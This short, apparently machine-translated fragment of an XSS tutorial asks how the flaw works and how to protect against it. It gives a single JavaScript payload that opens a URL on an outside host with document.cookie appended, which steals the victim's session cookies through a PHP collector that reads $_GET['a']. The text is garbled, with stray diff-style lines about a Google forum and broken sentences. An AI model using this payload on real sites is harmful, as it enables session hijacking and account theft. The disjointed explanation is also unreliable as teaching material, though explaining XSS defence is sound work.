XSS flaw, what is it and how to protect it?

 window.open(‘http://votresite.com/xss.php?a=’+document.cookie)

-XSS on Google Forum
+The XSS flaw on a Google forum

 By seeing the code, we understand perfectly that there is?
 A =, it is the variable $ _GET ['a'] of our code.